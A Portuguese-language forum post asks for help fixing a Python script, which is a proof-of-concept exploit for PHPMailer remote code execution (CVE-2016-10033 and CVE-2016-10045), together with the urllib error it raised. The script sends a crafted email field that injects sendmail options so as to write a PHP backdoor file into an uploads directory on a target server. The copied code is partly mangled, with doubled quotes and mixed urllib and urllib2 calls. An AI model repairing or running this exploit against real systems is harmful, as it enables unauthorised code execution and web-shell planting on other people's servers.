Olá a todos!
Estou com problemas em executar o seguinte código e gostaria de dicas para que ele possa rodar:
import time
import urllib
import socket
import sys
import urllib.request
RW_DIR = "/var/www/html/uploads"
url = ''http://VictimWebServer/contact_form.php'' # Set destination URL here
# Choose/uncomment one of the payloads:
# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
payload = ''"attacker\" -o que/tmp/ -X%s/phpcode.php some"@email.com'' % RW_DIR
# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
#payload = ""attacker\'' -o que/tmp/ -X%s/phpcode.php some"@email.com" % RW_DIR
######################################
# PHP code to be saved into the backdoor php file on the target in RW_DIR
RCE_PHP_CODE = "<?php phpinfo(); ?>"
post_fields = {''action'': ''send'', ''name'': ''Jas Fasola'', ''email'': payload, ''msg'': RCE_PHP_CODE}
# Attack
data = urllib.urlencode(post_fields)
req = urllib2.Request(url, data)
response = urllib2.request.urlopen(req)
the_page = response.read()
APÓS EXECUTAR O SEGUINTE ERRO RETORNA:
Traceback (most recent call last):
File "/root/XPLOIT/xpl_phpmailer.py", line 29, in <module>
data = urllib.urlencode(post_fields)
AttributeError: module ''urllib'' has no attribute ''urlencode''
Desde já agradeço!